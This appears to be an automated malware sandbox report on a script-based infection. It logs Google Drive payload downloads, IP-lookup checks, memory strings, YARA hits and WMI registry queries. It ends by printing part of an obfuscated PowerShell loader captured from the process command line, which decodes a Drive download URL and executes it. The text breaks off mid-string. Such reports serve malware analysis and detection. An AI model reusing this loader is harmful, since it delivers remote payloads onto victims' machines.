Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1NIu13gYclipFPqq145lj8sWnvpxxfEld HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=1NIu13gYclipFPqq145lj8sWnvpxxfEld&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1NIu13gYclipFPqq145lj8sWnvpxxfEld HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=1NIu13gYclipFPqq145lj8sWnvpxxfEld&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive |
Source: wscript.exe, 00000001.00000003.1606614767.0000024CCF25F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1607337961.0000024CCF2E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1608061400.0000024CCF2E9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en |
Source: wscript.exe, 00000001.00000003.1485959953.0000024CD1079000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1486237461.0000024CD10A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1606614767.0000024CCF25F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1485193301.0000024CD10A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1607337961.0000024CCF2E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1608061400.0000024CCF2E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1608193930.0000024CD0FF0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000001.00000003.1486237461.0000024CD10A0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d4733d4e148b3 |
Source: wscript.exe, 00000001.00000003.1486091804.0000024CD102D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1486237461.0000024CD1055000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d4733d4e14 |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB4E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000003.00000002.2255196351.00000250CBDD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000007.00000002.2051623128.0000000004C08000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BBD61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2051623128.0000000004AB1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000007.00000002.2051623128.0000000004C08000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BBD61000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000007.00000002.2051623128.0000000004AB1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB10000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googPz |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BBF87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BD61A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BBF87000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5P |
Source: powershell.exe, 00000007.00000002.2051623128.0000000004C08000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5XR |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1EC000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1EC000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5&export=download |
Source: powershell.exe, 00000007.00000002.2051623128.0000000004C08000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BCFF7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.2255196351.00000250CBDD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 49707 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49707 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49716 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49717 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49714 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49716 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49717 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49714 |
Source: amsi32_1836.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 6816, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 1836, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns |